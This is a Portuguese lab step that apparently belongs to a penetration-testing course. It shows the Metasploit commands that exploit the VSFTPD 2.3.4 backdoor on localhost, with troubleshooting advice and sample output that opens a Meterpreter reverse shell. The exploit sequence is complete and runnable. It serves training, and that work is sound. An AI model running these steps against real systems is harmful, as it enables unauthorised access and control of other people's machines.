Obter Acesso Inicial
Nesta etapa, você obterá acesso ao sistema alvo explorando um backdoor no serviço VSFTPD 2.3.4. Isso lhe fornecerá uma sessão Meterpreter para a pós-exploração.
Primeiro, inicie o console do Metasploit Framework.
msfconsole -q
Assim que o Metasploit estiver em execução, selecione o exploit para o backdoor do VSFTPD 2.3.4.
use exploit/unix/ftp/vsftpd_234_backdoor
Agora, configure as opções do alvo e do payload. Como o serviço está rodando na mesma máquina, usaremos o IP de loopback. O payload padrão requer LHOST e pode falhar com a mensagem "All encoders failed to encode" - defina o encoder para evitar isso:
set RHOSTS 127.0.0.1
set LHOST 127.0.0.1
set Encoder generic/none
Por fim, execute o exploit.
exploit
SOLUÇÃO DE PROBLEMAS: Se você vir Msf::OptionValidateError One or more options failed to validate: LHOST, execute set LHOST 127.0.0.1. Se você vir All encoders failed to encode, execute set Encoder generic/none. Em seguida, execute exploit novamente.
AVISO: A primeira tentativa pode falhar com "Unable to connect to backdoor on 6200/TCP. Cooldown?" ou "Exploit completed, but no session was created." Se isso acontecer, basta executar o comando exploit novamente - a segunda tentativa deve ter sucesso.
Se for bem-sucedido, uma sessão Meterpreter será aberta (sessão 1).
[*] Started reverse TCP handler on 127.0.0.1:4444
[!] 127.0.0.1:21 - The port used by the backdoor bind listener is already open. Trying...
[+] 127.0.0.1:21 - Backdoor has been spawned!
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:xxxxx) at ...
meterpreter >
Agora você tem uma sessão Meterpreter. Para retornar ao prompt msf > para a próxima etapa, pressione Ctrl+Z e depois y quando for perguntado "Background session 1?".